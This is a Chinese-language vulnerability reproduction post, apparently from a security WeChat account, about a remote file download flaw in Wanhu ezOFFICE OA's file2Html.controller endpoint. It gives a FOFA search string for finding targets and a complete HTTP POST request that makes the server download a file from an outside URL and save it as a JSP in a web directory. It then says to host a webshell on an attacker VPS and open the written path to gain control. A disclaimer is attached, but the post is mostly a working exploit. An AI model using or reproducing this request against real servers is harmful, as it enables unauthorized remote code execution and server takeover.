【漏洞复现】万户OA file2Html.controller 远程文件下载漏洞(RCE)
免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责
fofa: app="万户网络-ezOFFICE"
微信公众号搜索:潜陌安全 该文章潜陌安全公众号首发
- 漏洞描述
万户OA(Office Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。 万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器,导致攻击者可获取服务器控制权限。
- 漏洞复现
这个漏洞没有可以判断的状态码
POST /defaultroot/yzConvertFile/file2Html.controller HTTP/1.1
Host: ip
User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/116.0.0.0 Safari/537.36
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
fileName=qwe.jsp&path=../platform/portal/&url=http://dnslog.com
dnslog成功响应,漏洞存在
- 漏洞利用
首先进行上一步的操作,在攻击机vps上放马即可访问下面链接即可
Url/defaultroot/platform/portal/com/qwe.jsp
- 工具检测
借助大佬写好的nuclei即可完成检测
关注关注作者公众号 :)
分析最新poc,使用渗透测试小工具